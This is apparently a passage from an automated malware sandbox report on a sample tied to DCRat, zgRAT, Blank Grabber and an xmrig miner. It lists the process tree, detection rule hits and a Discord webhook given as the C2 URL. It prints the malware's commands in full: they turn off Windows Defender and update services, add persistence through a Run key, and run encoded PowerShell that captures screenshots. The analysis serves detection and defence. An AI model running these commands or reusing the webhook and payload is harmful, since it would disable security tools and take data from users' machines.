HYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
              • csc.exe (PID: 8656 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                • cvtres.exe (PID: 8696 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • cmd.exe (PID: 8728 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 8872 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 8736 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • getmac.exe (PID: 8848 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
          • cmd.exe (PID: 8976 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 9004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 9092 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 9180 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 9196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 6824 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 8264 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 8092 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
  • dasHost.exe (PID: 8408 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)
  • dasHost.exe (PID: 7956 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)
  • cmd.exe (PID: 3652 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": "https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      C:\Recovery\winlogon.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\winlogon.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              Click to see the 10 entries
              SourceRuleDescriptionAuthorStrings
              00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    00000006.00000003.1736293542.00000202B6EA5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                        Click to see the 10 entries
                        SourceRuleDescriptionAuthorStrings
                        12.3.svchost.exe.5c4e6ea.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          12.3.svchost.exe.5c4e6ea.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            12.3.svchost.exe.644e6ea.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                              12.3.svchost.exe.644e6ea.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                52.0.ChainComServermonitor.exe.af0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                  Click to see the 5 entries

                                  Operating System Destruction

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 3652, ProcessName: cmd.exe

                                  System Summary

                                  barindex
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe, ProcessId: 7204, TargetFilename: C:\ProgramData\svchost.exe
                                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wouVpTZDoyPyABKEH
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6900, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 7296, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6900, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7304, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7268, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7500, ProcessName: wscript.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7268, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7500, ProcessName: wscript.exe
                                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6900, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe, ParentProcessId: 7204, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 7268, ProcessName: svchost.exe
                                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7268, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7500, ProcessName: wscript.exe
                                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\svchost.exe, ProcessId: 7268, TargetFilename: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe
                                  Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAI